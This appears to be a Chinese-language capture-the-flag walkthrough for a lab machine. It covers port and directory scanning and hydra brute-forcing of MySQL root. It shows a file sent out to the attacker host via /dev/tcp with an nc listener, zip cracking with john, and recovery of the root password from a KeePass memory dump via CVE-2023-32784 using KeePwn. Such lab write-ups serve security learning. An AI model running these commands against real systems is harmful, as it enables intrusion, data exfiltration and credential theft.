信息收集

枚举端口

nmap 192.168.109.132 -sS -sV -min-rate 5000 -Pn -p- 

• -p- ：扫描所有端口。 (65535)
• -sS：执行TCP SYN 扫描以快速扫描哪些端口打开。
• -sC：使用基本识别脚本执行扫描
• -sV：执行服务扫描
• –min-rate 5000：我们指定端口扫描速度不低于每秒 5000 个数据包，前一个参数和这个参数使扫描花费的时间更短。
• -n：不执行 DNS 解析，我们防止扫描时间超过必要的时间。
• -Pn：我们通过 ping 禁用主机发现。

扫描目录

dirsearch -u 192.168.109.131 -x 404

• -x 404 : 排除404的错误

收集CMS

cmseek -u 目标ip

很明显框架是Wordpress并扫描出一个mortadela用户

渗透阶段

爆破mysql

根据前面的用户和mysql的默认用户root,进行九头蛇爆破

hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.109.132

连接时注意

可能会出现SSL加密连接：

Enter password:

ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

mysql -h 192.168.109.132 -u root -p --skip-ssl

--skip-ssl 来禁用 SSL 连接

获取数据库的ssh的密码

ssh连接

获取第一个标志

cd到一个奇怪的目录，发现有一个压缩包，还是加密的

给他下载到自己的本机上面

cat muyconfidencial.zip > /dev/tcp/192.168.109.128/6666

nc -lvp 6666 > a.zip

zip2john a.zip > tmp
john --wordlist=/usr/share/wordlists/rockyou.txt tmp
john  tmp --show

解码出文件

unzip a.zip

这是一个CVE-2023-32784的漏洞

有兴趣的可以去看一下链接，这个漏洞的原理

https://github.com/z-jxy/keepass_dump

安装解密的keepwn命令

git clone https://github.com/Orange-Cyberdefense/KeePwn && cd KeePwn
python3 -m pip install .
KeePwn --help

解密

mv Database.kdbx ./KeePwn
mv KeePass.DMP ./KeePwn
python3 KeePwn.py parse_dump -d KeePass.DMP -b Database.kdbx //有点慢

这个网站进行解密

https://app.keeweb.info/

要先把Database.kdbx这个文件拖到windows桌面，再放到上面的网站进行解密

就出来root用户和密码了

拿下

总结：

其实主要学习的就是这个

Keepass转储器

这是我对 CVE-2023-32784 的 PoC 实现